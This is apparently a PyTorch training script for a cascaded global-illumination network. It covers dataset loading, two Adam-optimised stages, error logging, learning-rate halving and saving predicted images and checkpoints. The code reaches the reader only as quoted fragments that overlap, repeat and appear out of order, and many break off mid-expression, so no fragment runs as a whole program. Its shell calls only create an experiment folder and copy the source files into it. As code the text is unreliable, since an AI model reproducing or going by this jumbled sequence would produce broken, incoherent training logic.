"3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum",
"of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+',",
") trainingLog.close() # Update the training rate if (epoch + 1) % 2",
"run with --cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"* globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j)",
"globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5,",
"# Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the",
"tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment,",
"from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal']",
"0: # Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch)",
"+= 1 # Load data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape)",
").data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image(",
"'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W, g3W =",
"opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed)",
"###################### # Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch =",
"######################################################## # Build the cascade network architecture # globalIllu2s = [] globalIllu3s =",
"axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :],",
"os.system('cp *.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId =",
"argparse.ArgumentParser() # The location of the training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment',
"epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) ) torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment,",
") globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things into GPU if",
"= False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList",
"n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2)",
"rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu",
"= opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle =",
"1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for",
")**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2)",
") roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## #",
"opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize,",
"# The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction",
"have a CUDA device, so you should probably run with --cuda\") #################################### #",
"and not opt.cuda: print(\"WARNING: You have a CUDA device, so you should probably",
"random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda:",
"help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int, default = -1, help='the",
") normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize,",
"opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch,",
"utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch,",
") normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu )",
"1000 or j% 2000 == 0: # Save the ground truth and the",
"vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch,",
"opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() #########################################",
") depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"or j% 2000 == 0: # Save the ground truth and the input",
"j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j,",
"globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) ) torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment, epoch)",
"for training network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of",
"path to store samples and models') # The basic training setting parser.add_argument('--nepoch', type=int,",
"None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment )",
"0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n]",
"inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() )",
"3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch =",
"torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3",
"default=None, help='the path to store samples and models') # The basic training setting",
"opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination",
"j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch,",
"dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough']",
"np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)",
"opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False)",
") seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu )",
"Build the cascade network architecture # globalIllu2s = [] globalIllu3s = [] n",
"######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m",
"help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input",
"imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture # globalIllu2s",
"trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :],",
"j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList =",
"= imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### ####################################",
"in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] -",
"[] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append(",
", '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment,",
"in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment,",
"numpy as np from torch.autograd import Variable import torch.optim as optim import argparse",
"0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results",
"# Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment,",
"globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W",
"1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) )",
"help='the height / width of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables",
"segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2",
"%s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed",
"#################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize,",
"dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1']",
"* globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error",
"(depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( (",
"depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu",
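The resize_/copy_ calls in these fragments refill preallocated Variables each iteration, which appears to be a pre-0.4 PyTorch idiom. A hedged sketch of the modern equivalent, one .to(device) per batch (shapes here are illustrative, not taken from the loader):

    import torch

    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    imP1_cpu = torch.rand(16, 3, 256, 256)  # stand-in for dataBatch['imP1']
    imP1Batch = imP1_cpu.to(device)         # replaces data.resize_(...).copy_(...)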
") ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things into GPU",
"seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu",
"#################################### #################################### # Global Optimier opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3",
"+ 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j)",
"( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the",
"+ 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data , '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for",
"globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in",
"depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId)",
"3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch =",
"dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture",
") imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu )",
").data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment,",
"= globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimizer opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(),
"depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) )",
"for m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) *",
"utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) #",
"network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how many levels of cascades should we use')
"default=[0], help='the gpus used for training the network') # The training weight parser.add_argument('--globalIllu2', type=float,
"= opt.batchSize, num_workers = 8, shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones(",
"DataLoader parser = argparse.ArgumentParser() # The location of the training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path
") globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item()",
"import DataLoader parser = argparse.ArgumentParser() # The location of the training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/',
"opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j)",
"False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList =",
"to fine-tune the network or not') parser.add_argument('--epochId', type=int, default = -1, help='the training",
"dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg']",
"j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog,",
"imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch)",
"models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs",
"+ 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the learning
"opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(),",
"np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)",
"so you should probably run with --cuda\") #################################### # initialize tensors albedoBatch =
"torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ########################################################",
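The second cascade stage consumes the first stage's prediction concatenated with the geometry buffers, and the .detach() stops the second stage's loss from backpropagating into the first network through that input. A minimal sketch with hypothetical conv stages; channel counts are assumptions, not the original models.globalIllumination architecture:

    import torch
    import torch.nn as nn

    stage1 = nn.Conv2d(13, 3, 3, padding=1)  # 3 image + 10 buffer channels (assumed)
    stage2 = nn.Conv2d(13, 3, 3, padding=1)

    img = torch.randn(2, 3, 64, 64)
    buffers = torch.randn(2, 10, 64, 64)      # albedo/normal/rough/depth/seg stack

    pred2 = stage1(torch.cat([img, buffers], dim=1))
    inp3 = torch.cat([pred2, buffers], dim=1)
    pred3 = stage2(inp3.detach())             # gradient cut, as in inputGlob3.detach()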
"import utils import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The",
"else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j)",
"+ 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2)",
"the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0],",
"illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) )",
"cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training the network') # The
"opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize,",
"opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture # globalIllu2s = []",
"+ g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs,",
"+ 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n)",
"things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch =",
"= dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu =",
"betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset",
"imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu",
"the network or not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of",
"1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch =",
"= DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False) j =",
"param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2",
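The schedule in these fragments halves every parameter group's learning rate on both Adam optimizers every second epoch. A minimal runnable sketch; the Linear modules are illustrative stand-ins for globIllu1to2/globIllu2to3:

    import torch.nn as nn
    import torch.optim as optim

    net1, net2 = nn.Linear(4, 4), nn.Linear(4, 4)  # illustrative stand-ins
    op1 = optim.Adam(net1.parameters(), lr=2e-4, betas=(0.5, 0.999))
    op2 = optim.Adam(net2.parameters(), lr=2e-4, betas=(0.5, 0.999))

    for epoch in range(4):
        if (epoch + 1) % 2 == 0:            # every second epoch
            for op in (op1, op2):
                for param_group in op.param_groups:
                    param_group['lr'] /= 2  # halve the learning rate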
"images') parser.add_argument('--experiment', default=None, help='the path to store samples and models') # The basic",
") imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 =",
"to store samples and models') # The basic training setting parser.add_argument('--nepoch', type=int, default=18,",
"albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu",
"network architecture # globalIllu2s = [] globalIllu3s = [] n = 0 inputGlob2",
"epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0),",
"shuffle = False) j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)",
"epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j += 1 # Load data",
"imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"vutils import utils import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() #",
"+ 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2)",
"in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data,",
"imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade",
"== 1 or j == 1000 or j% 2000 == 0: # Save",
"= (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image(",
"= 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1,",
"The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2')",
"globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2',",
"The basic training setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training')",
"for i, dataBatch in enumerate(brdfLoader): j += 1 # Load data from cpu",
"type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch",
"Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch",
"used for training the network') # The training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight
"*.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0]",
"to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used",
"if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA device, so you",
"j) if j == 1 or j == 1000 or j% 2000 ==",
"Global Optimizer opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4,
"results for n in range(0, opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] +",
"as np from torch.autograd import Variable import torch.optim as optim import argparse import",
"utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu',
"utils import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The location
"the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how many levels
